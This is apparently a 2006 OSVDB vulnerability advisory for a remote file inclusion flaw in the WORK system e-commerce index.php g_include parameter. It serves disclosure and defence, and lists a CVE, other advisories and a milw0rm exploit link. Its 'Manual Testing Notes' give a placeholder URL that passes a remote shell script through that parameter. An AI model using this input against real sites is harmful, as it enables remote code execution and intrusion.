WORK system e-commerce index.php g_include Variable Remote File Inclusion

2006-11-10T11:49:47
ID OSVDB:30491
Type osvdb
Reporter OSVDB
Modified 2006-11-10T11:49:47

Description

Manual Testing Notes

http://[target]/work/index.php?g_include=[shell_script]

References:

Vendor URL: http://worksystem.sourceforge.net/
Secunia Advisory ID: 22963
Related OSVDB ID: 30492
Mail List Post: http://attrition.org/pipermail/vim/2006-November/001131.html
Mail List Post: http://attrition.org/pipermail/vim/2006-November/001129.html
Mail List Post: http://attrition.org/pipermail/vim/2006-November/001130.html
Mail List Post: http://attrition.org/pipermail/vim/2006-November/001128.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0296.html
ISS X-Force ID: 30199
Generic Exploit URL: http://www.milw0rm.com/exploits/2752
FrSIRT Advisory: ADV-2006-4582
CVE-2006-6041